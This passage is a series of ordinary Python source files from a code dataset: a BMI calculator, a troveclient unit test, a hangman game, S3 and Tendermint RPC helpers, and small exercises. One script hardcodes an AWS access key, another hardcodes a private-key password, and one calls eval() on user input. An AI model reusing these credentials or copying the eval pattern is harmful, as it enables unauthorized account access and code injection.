Entry(frame)\nbmi_height_entry.place(relx=0.4, rely=0.3)\n\nuser_gender = Label(frame, text=\"Gender:\", bg='white', fg='green')\nuser_gender.place(rely=0.53, relx=0.1)\n\nage = Label(frame, text=\"Age:\", bg='white', fg='green')\nage.place(rely=0.8, relx=0.1)\nage_entry = Entry(frame, state='readonly')\nage_entry.place(rely=0.8, relx=0.4)\n\noptions = ['Female...', 'Male']\nvariable = StringVar(frame)\nvariable.set(options[0])\n\n# Below is the functions created\ndef activate(value):\n variable.set(value)\n if value != \"Select...\":\n age_entry.config(state='normal')\n else:\n age_entry.config(state='readonly')\n\n\ngender_menu = OptionMenu(frame, variable, *options, command=activate)\ngender_menu.place(relx=0.4, rely=0.5)\n\n\ndef bmi_calc():\n try:\n float(bmi_weight_entry.get())\n float(bmi_height_entry.get())\n float(age_entry.get())\n if variable.get() == \"Female..\":\n raise ValueError\n elif variable.get() == \"Male\":\n result = ((0.5 * 
float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + 11.5\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n elif variable.get() == \"Female\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + (\n 0.03 * float(age_entry.get())) + 11\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n if result_bmi < 18.5:\n category.config(text='Underweight')\n elif 18.5 <= result_bmi < 25:\n category.config(text='Healthy')\n elif 25 <= result_bmi < 30:\n category.config(text='Overweight')\n elif result_bmi >= 30:\n category.config(text='Obese')\n\n except ValueError:\n messagebox.showerror(title=None, message='Gender was not specified or invalid entry was given')\n delete()\n\n\ncalculate = Button(root, text=\"Calculate your Ideal Body Mass Index\", width=50, command=bmi_calc)\ncalculate.place(rely=0.45, relx=0.2)\n\nbmi = Label(root, text=\"BMI:\", bg='white', fg=\"green\")\nbmi.place(rely=0.55, relx=0.1)\nbmi_field = Entry(root, state='readonly')\nbmi_field.place(rely=0.55, relx=0.2)\nideal_bmi = Label(root, text='Ideal BMI:', bg='white', fg=\"green\")\nideal_bmi.place(rely=0.55, relx=0.5)\nideal_field = Entry(root, state='readonly')\nideal_field.place(rely=0.55, relx=0.65)\n\n# The delete button function\ndef delete():\n bmi_weight_entry.delete(0, END)\n bmi_height_entry.delete(0, END)\n age_entry.config(state='normal')\n bmi_field.config(state='normal')\n ideal_field.config(state='normal')\n age_entry.delete(0, END)\n bmi_field.delete(0, END)\n ideal_field.delete(0, END)\n age_entry.config(state='readonly')\n bmi_field.config(state='readonly')\n ideal_field.config(state='readonly')\n bmi_weight_entry.focus()\n variable.set(options[0])\n category.config(text='')\n\n\ncategory_head = Label(root, text=\"Category:\", bg='orange', fg='white')\ncategory = Label(root, width=20, bg='blue', fg='white')\ncategory.place(relx=0.38, rely=0.72)\ncategory_head.place(relx=0.45, rely=0.67)\nclear = Button(root, text='Clear', command=delete)\nclear.place(rely=0.85, relx=0.1)\nquit = Button(root, text='Exit', command='exit')\nquit.place(rely=0.85, relx=0.83)\n\n\nroot.mainloop()\n","repo_name":"mndabeni06/BMI_CALCULATOR","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72611774831","text":"import testtools\nfrom unittest import mock\n\nfrom troveclient.v1 import root\n\n\"\"\"\nUnit tests for root.py\n\"\"\"\n\n\nclass RootTest(testtools.TestCase):\n def setUp(self):\n super(RootTest, self).setUp()\n self.orig__init = root.Root.__init__\n root.Root.__init__ = mock.Mock(return_value=None)\n self.root = root.Root()\n self.root.api = mock.Mock()\n self.root.api.client = mock.Mock()\n\n def tearDown(self):\n super(RootTest, self).tearDown()\n root.Root.__init__ = self.orig__init\n\n def _get_mock_method(self):\n self._resp = 
mock.Mock()\n self._body = None\n self._url = None\n\n def side_effect_func(url, body=None):\n self._body = body\n self._url = url\n return (self._resp, body)\n\n return mock.Mock(side_effect=side_effect_func)\n\n def test_delete(self):\n self.root.api.client.delete = self._get_mock_method()\n self._resp.status_code = 200\n self.root.delete(1234)\n self.assertEqual('/instances/1234/root', self._url)\n self._resp.status_code = 400\n self.assertRaises(Exception, self.root.delete, 1234)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"} +{"seq_id":"17949364832","text":"#_main_\r\nli=[]\r\nwhile(True):\r\n item = eval(input(\"\\nEnter any correct format item to insert = \"))\r\n ind = int(input(\"Enter the index for insertion = \"))\r\n if(ind>len(li) or ind<0):\r\n print(\"Array index is out of range. Try Again !\")\r\n continue\r\n else:\r\n li.insert(ind, item)\r\n print(\"Now your array = \", li)\r\n \r\n choice = int(input(\"Want to continue? (1/0) = \"))\r\n if(choice==0):\r\n print(\"---> Come again later <---\")\r\n break\r\n continue","repo_name":"RitamPaul/Python_Scripting_College","sub_path":"insertItems_List.py","file_name":"insertItems_List.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"484128203","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO\nfrom scipy.stats import entropy\nfrom datetime import datetime\n\nS3_BUCKET = 'dmm-microbench'\n\ns3 = boto3.client('s3', aws_access_key_id=\"AKIASVDNFDSGZYUVLQED\", aws_secret_access_key=\"y8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXre\")\n\ndef download_s3_file(file_name, destination_file_name):\n s3.download_file(Bucket=S3_BUCKET, Key=file_name, Filename=destination_file_name)\n\ndef get_content(file_name, expression):\n return s3.select_object_content(\n Bucket=S3_BUCKET,\n Key=file_name,\n ExpressionType='SQL',\n Expression=expression,\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"Use\"}},\n OutputSerialization={'CSV': {}},\n )\n\n\ndef convert_data_to_df(data, record_header):\n for event in data['Payload']:\n if 'Records' in event:\n record_header.append(event['Records']['Payload'])\n csv_content = ''.join(r.decode('utf-8').replace(\"\\r\", \"\") for r in record_header)\n csv_pd = pd.read_csv(StringIO(csv_content))\n\n print('\\n##################################')\n print(f\"Length of dataframe: {len(csv_pd)}\")\n print(f\"Memory usage of dataframe: \\n {csv_pd.info(memory_usage='deep')}\")\n print('\\n##################################')\n\n return pd.DataFrame(csv_pd)\n\ndef convert_file_to_hdf5(file_name):\n import vaex\n vaex.from_csv(file_name, convert=True, chunk_size=500_000)\n\ni = 1\n\ndownload_s3_file(f\"yellow_tripdata_2019-0{i}.csv\", f\"yellow_tripdata_2019-0{i}.csv\")\n \nconvert_file_to_hdf5(f\"yellow_tripdata_2019-0{i}.csv\")","repo_name":"mohithg/largedata-histogram","sub_path":"test_vaex.py","file_name":"test_vaex.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21211815754","text":"import math\nimport sys\n\ndef C(n, k):\n return math.factorial(n) // math.factorial(k) // math.factorial(n-k)\n\ndef main():\n billionaire_ways = 0\n for h in range(432, 1001):\n 
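# C(1000, h) counts the equally likely head/tail sequences with exactly\n        # h heads; the sum over h >= 432, divided by 2**1000 below, is the\n        # probability that the gambler ends up a billionaire\n        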
billionaire_ways += C(1000, h)\n print(billionaire_ways / 2**1000)\n \nif __name__ == '__main__':\n sys.exit(main())\n\n# Final capital = (1 + 2x)^h (1 - x)^(1000 - h) where h is the count of heads.\n#\n# To be a billionaire, we need (1 + 2x)^h (1 - x)^(1000 - h) >= 10^9.\n# Or h >= (9 Log[10] - 1000 Log[1 - x])/(-Log[1 - x] + Log[1 + 2 x])\n#\n# By Wolfram Alpha website, we can solve the equation D[g(x), x] = 0\n# The proportion x ~~ 0.14688392244094067657558240, and thus \n# g(x) ~~ 431.25594829396045105038827, or h = 432.\n","repo_name":"syurskyi/Algorithms_and_Data_Structure","sub_path":"_algorithms_challenges/projecteuler/ProjectEuler-master(2)/ProjectEuler-master/267.py","file_name":"267.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"15647171467","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n turtle.setpos(20,230)\n turtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n turtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n coordenada_x1 = (window_comprimento/-2)+30\n turtle.setpos(coordenada_x1,-200)\n turtle.pendown()\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.right(90)\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.penup()\n coordenada_x2 = (window_comprimento/-2)+105\n turtle.setpos(coordenada_x2,-200)\n turtle.pendown()\n turtle.forward(250)\n turtle.right(90)#(-245,150)\n turtle.forward(100)\n turtle.right(90)#(-145,150)\n turtle.forward(25)\n turtle.penup()\n turtle.left(90)#(-145,125)\n turtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,25)\n turtle.left(180)\n turtle.pendown()\n turtle.fillcolor('yellow')\n turtle.begin_fill()\n turtle.circle(25)\n turtle.end_fill()\n turtle.fillcolor('black')\n turtle.penup()\n turtle.left(180)\n turtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(90)\n turtle.pendown()\n turtle.forward(80)\n turtle.penup()\n turtle.left(90)\n turtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(135)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(135)\n turtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(45)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(45)\n turtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(120)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(120)\n turtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(60)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(60)\n turtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n posicoes_letras = []\n coordenada_x = (window_comprimento/2)-30\n turtle.setpos(coordenada_x,-225)\n turtle.left(180)\n turtle.pensize(3)\n for i in letras_palavra:\n if i == ' ':\n turtle.forward(35)\n posicoes_letras.append([turtle.pos(),i])\n 
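# every non-space character gets a 30px dash drawn for it below, while\n        # spaces (handled above) only advance the pen, leaving a word gap\n        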
else:\n turtle.pendown()\n turtle.forward(30)\n turtle.penup()\n turtle.forward(5)\n posicoes_letras.append([turtle.pos(),i])\n turtle.pensize(5)\n turtle.left(180)\n turtle.home()\n posicoes_letras.reverse()\n return posicoes_letras\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, erros, acertos, erros_lista):\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n \n coordenada_x = (window_comprimento/-2)+erros*20\n index_acertos = []\n erro = ''\n \n \n if escolha in no_accent:\n for x,e in enumerate(no_accent):\n if escolha == e:\n index_acertos.append(x)\n if index_acertos in acertos:\n None\n for i in index_acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n return 0,index_acertos,None\n else:\n erro = escolha\n if erro in erros_lista:\n return 1,None,None\n else:\n turtle.setpos(coordenada_x+30,-255)\n turtle.write(escolha, font=('Arial',18,'bold'))\n turtle.home()\n return 1,None,erro\n\ndef caneta_setup ():\n caneta.hideturtle()\n caneta.speed(100)\n caneta.penup()\n caneta.color('Black')\n caneta.pensize(5)\n\ndef setup_window(comprimento):\n if comprimento <= 500:\n comprimento += 80\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 500 and comprimento <= 650:\n comprimento += 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 650 and comprimento <= 800:\n comprimento -= 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 800 and comprimento <= 1000:\n comprimento -= 110\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n else:\n comprimento -= 250\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n time.sleep(2)\n return True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros, erros_lista, window_comprimento):\n coordenada_x = (window_comprimento/-2)+30\n \n for i in acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n \n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n 
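# with five misses everything except the right leg is redrawn\n        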
desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n return True\n else:\n None\n \n turtle.setpos(coordenada_x,-255)\n for j in erros_lista:\n turtle.write(j, font=('Arial',18,'bold'))\n turtle.forward(20)\n\ndef sim():\n window.reset()\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # limite_x: +-330, Limite_y: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\n\n\nlista_palavras = [] \nL = open('entrada.txt','r+',encoding='utf-8')\n\nfor i in L.readlines():\n s = i.lower().strip()\n if s == '':\n None\n else:\n lista_palavras.append(s)\nL.close()\n'''\n-------------------------------------------------------------------------------\n'''\n\nletras_palavra = []\n\nwhile lista_palavras != []:\n shuffle(lista_palavras)\n palavra = lista_palavras[int(len(lista_palavras)/2)]\n del lista_palavras[int(len(lista_palavras)/2)]\n \n for i in palavra:\n letras_palavra.append(i)\n letras_palavra.reverse()\n \n comprimento = (len(letras_palavra)*35)*2\n\n setup_window(comprimento)\n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n \n posicoes_letras = desenho_espacos(caneta, letras_palavra, window.window_width()) \n \n escolha = ''\n erros = 0\n erros_lista = []\n acertos = [] \n \n while True:\n escolha = window.textinput('','Escolha uma letra ou chute a palavra')\n \n if escolha == None:\n caneta.setpos(-175,100)\n caneta.write('Jogador desistiu. 
Volte sempre.', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n if escolha == no_accent or escolha == palavra:\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n elif escolha.isalpha() and len(escolha) == 1:\n a = []\n s = 0\n e = ''\n \n s,a,e = desenho_letras(caneta, palavra, posicoes_letras, escolha, window.window_width(), erros, acertos, erros_lista)\n if a == None:\n a = []\n else:\n for i in a:\n acertos.append(i)\n \n if e == None:\n e = ''\n else:\n erros_lista.append(e)\n erros += s\n \n \n p = body_maker(erros)\n if p == True:\n break\n \n \n if len(acertos) == len(palavra):\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n caneta.setpos(-95,100)\n caneta.write('Escolha Inválida.', font=('Arial',18,'bold'))\n time.sleep(2)\n caneta.reset()\n caneta_setup()\n \n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n desenho_espacos(caneta, letras_palavra, window.window_width())\n repor_desenho(caneta, posicoes_letras, acertos, erros, erros_lista, window.window_width())\n caneta.reset()\n window.reset()\n caneta_setup()\n if escolha == None:\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n \n \n \n \n'''\n-------------------------------------------------------------------------------\n'''\n\n\n\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(9).py","file_name":"Exercicio Jogo da Forca(9).py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18432273630","text":"'''\n========================\nservice utilities module\n========================\nCreated on July.14, 2020\n@author: Xu Ronghua\n@Email: rxu22@binghamton.edu\n@TaskDescription: This module provide encapsulation of test API to interact with RPC exposed by service node.\n'''\n\nimport time\nimport logging\nimport requests\nimport json\n\nfrom utilities import TypesUtil, FileUtil\nfrom wrapper_pyca import Crypto_Hash, Crypto_DSA\nfrom Tender_RPC import Tender_RPC\n\n\nlogger = logging.getLogger(__name__)\n# indextoken_logger = logging.getLogger(\"Index_Token\")\n# indextoken_logger.setLevel(logging.INFO)\n\n\nclass TenderUtils(object):\n @staticmethod\n def load_ENF(ENF_file):\n '''\n Load ENF data from ENF_file\n\n Args:\n ENF_name: ENF file name\n Returns:\n json_ENF: json format ENF data\n\n '''\n ls_lines=FileUtil.ReadLines(ENF_file)\n ls_record=[]\n for line in ls_lines:\n #print(line[:-1].split(';'))\n ls_record.append(line[:-1].split(';'))\n\n ls_ENF=[]\n for record in ls_record:\n ls_ENF.append( format(float(record[0]), '.2f') )\n\n # print(ls_ENF)\n json_ENF = {}\n json_ENF['id']=ENF_file\n json_ENF['ENF']=ls_ENF\n\n return json_ENF\n\n\n @staticmethod\n def verify_ENF(ENF_file):\n '''\n Verify ENF value by querying from blockchain\n\n Args:\n ENF_name: ENF file name\n Returns:\n Verified result: True or False\n '''\n # 1) Read token data using call\n ls_time_exec = []\n\n query_json = {}\n query_json['data']='\"' + ENF_file +'\"'\n start_time=time.time()\n\n query_ret=Tender_RPC.abci_query(query_json)\n\n # -------- parse value from response and display it ------------\n key_str=query_ret['result']['response']['key']\n 
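# the ABCI query response carries key/value as base64 strings, so both\n        # fields are decoded before use\n        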
value_str=query_ret['result']['response']['value']\n logger.info(\"Fetched ENF value:\")\n logger.info(\"id: {}\".format(TypesUtil.base64_to_ascii(key_str)) )\n if( value_str!= None):\n query_ENF_value = TypesUtil.base64_to_ascii(value_str)\n else:\n query_ENF_value = ''\n # convert tx to json format\n query_ENF_json = TypesUtil.tx_to_json(query_ENF_value)\n logger.info(\"value: {}\".format(query_ENF_json))\n\n # 2) verify signature\n string_ENF = str(query_ENF_json['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n sign_ENF = TypesUtil.hex_to_string(query_ENF_json['sign_ENF'])\n\n load_public_key_bytes = Crypto_DSA.load_key_bytes('public_key_file')\n reload_public_key = Crypto_DSA.load_public_key_bytes(load_public_key_bytes)\n verify_sign=Crypto_DSA.verify(reload_public_key,sign_ENF,byte_ENF)\n logger.info(\"Sign verification: {}\".format(verify_sign))\n \n exec_time=time.time()-start_time\n ls_time_exec.append( format( exec_time*1000, '.3f' ) ) \n\n # Prepare log messgae\n str_time_exec=\" \".join(ls_time_exec)\n FileUtil.save_testlog('test_results', 'exec_verify_ENF.log', str_time_exec)\n\n # 3) return verify hash model result\n return verify_sign\n\n @staticmethod\n def tx_evaluate(ENF_file):\n '''\n Launch tx and evaluate tx committed time\n\n Args:\n ENF_file: ENF file name\n Returns:\n tx committed reulst\n '''\n # 1) load ENF data from file\n json_ENF = TenderUtils.load_ENF(ENF_file)\n logger.info(json_ENF)\n\n # 2) sign ENF data in json_ENF['ENF']\n string_ENF = str(json_ENF['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n load_private_key_bytes = Crypto_DSA.load_key_bytes('private_key_file')\n reload_private_key = Crypto_DSA.load_private_key_bytes(load_private_key_bytes, \n encryp_pw=b'samuelxu999')\n sign_ENF = Crypto_DSA.sign(reload_private_key, byte_ENF)\n logger.info(sign_ENF)\n\n # 3) evaluate tx committed time\n start_time=time.time()\n logger.info(\"tx signed ENF: {} to blockchain...\\n\".format(ENF_file)) \n\n # -------- prepare parameter for tx ------------\n tx_json = {}\n key_str = ENF_file\n value_json = {}\n value_json['ENF']=json_ENF['ENF']\n value_json['sign_ENF']=TypesUtil.string_to_hex(sign_ENF)\n # convert json to tx format\n value_str = TypesUtil.json_to_tx(value_json)\n tx_data = key_str + \"=\" + value_str \n # --------- build parameter string: tx=? 
--------\n tx_json['tx']='\"' + tx_data +'\"' \n # print(tx_json)\n tx_ret=Tender_RPC.broadcast_tx_commit(tx_json)\n exec_time=time.time()-start_time\n logger.info(\"tx committed time: {:.3f}\\n\".format(exec_time, '.3f')) \n FileUtil.save_testlog('test_results', 'exec_tx_commit_ENF.log', format(exec_time, '.3f'))\n # print(tx_ret)\n return tx_ret\n\nclass ContractUtils(object):\n '''\n Get BC_account given node_name\n @node_name: ip_address:port_num\n @datafile: node account datafile path\n '''\n @staticmethod\n def getAddress(node_name, datafile):\n address_json = json.load(open(datafile))\n return address_json[node_name]\n\n '''\n Get IndexAuth_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getIndexToken(service_addr, index_id, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getIndexToken\"\n params={}\n params['index_id']=index_id\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get authorized nodes\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getAuthorizedNodes(service_addr, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getAuthorizedNodes\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify hashed index value\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def verify_indexToken(service_addr, index_id, index_data, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/verify_indexToken\"\n params={}\n params['index_id']=index_id\n params['index_data']=index_data\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get CapAC_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getCapToken(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/getCapToken\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify Access\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidAccess(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/isValidAccess\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get Vnode information\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getVNodeInfo(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/getVNodeInfo\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 
'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify identity\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidID(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/isValidID\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\nclass MonoClient(object):\n '''\n Get record by id\n '''\n @staticmethod\n def Get_DataByID(data_args={}):\n # construct params\n params={}\n params['project_id']=data_args['project_id']\n\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/test/api/v1.0/dt/project\" \n\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args['data']), headers=headers)\n \n #get response json\n json_response = response.json() \n\n return json_response","repo_name":"samuelxu999/Research","sub_path":"Security/py_dev/BlendSPS/src/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"30653422542","text":"from typing import List\nfrom typing import List\n\ndef sneak_string_v1(chars: str) -> List[List[str]]:\n result = [[], [], []]\n index = len(result) // 2\n up_flag = 1\n for char in chars:\n if index == 0:\n result[0].append(char)\n result[1].append(' ')\n result[2].append(' ')\n index = 1\n up_flag = 0\n elif index == 1: \n result[0].append(' ')\n result[1].append(char)\n result[2].append(' ')\n if up_flag:\n index -= 1\n else:\n index += 1\n elif index == 2:\n result[0].append(' ')\n result[1].append(' ')\n result[2].append(char)\n up_flag = 1\n index = 1\n \n return result\n\ndef sneak_string_v2(chars: str, size: int) -> List[List[str]]:\n result = [[] for _ in range(size)]\n result_index = {i for i in range(len(result))}\n insert_index = len(result) // 2\n up_flag = 1\n \n for char in chars:\n result[insert_index].append(char)\n for rest_index in result_index - {insert_index}:\n result[rest_index].append(' ')\n \n if insert_index == min(result_index):\n insert_index += 1\n up_flag = 0\n elif insert_index == max(result_index):\n insert_index -= 1\n up_flag = 1\n else:\n if up_flag:\n insert_index -= 1\n else:\n insert_index += 1\n \n return result\n \n\ndef print_sneak(result: List[List[str]]) -> None:\n for list in result:\n print(''.join(list))\n \n \n \nif __name__ == '__main__':\n chars1 = '012345678901234567890123456789'\n chars2 = 'abcdefghijklmnopqrstuzwxyz'\n # result = sneak_string_v1(chars1)\n # print_sneak(result)\n result = sneak_string_v2(chars2, 10)\n print_sneak(result)","repo_name":"Tsujiba/Python-Sample","sub_path":"algolism/07_quiz/sneak_output.py","file_name":"sneak_output.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7389605836","text":"import logging\n\nfrom aiohttp import web\nfrom ipaddress import ip_address\nfrom netifaces import interfaces, ifaddresses, AF_INET\nimport qrcode\n\nfrom manokee.web.app import app\n\n\ndef ipv4_addresses():\n result = []\n for 
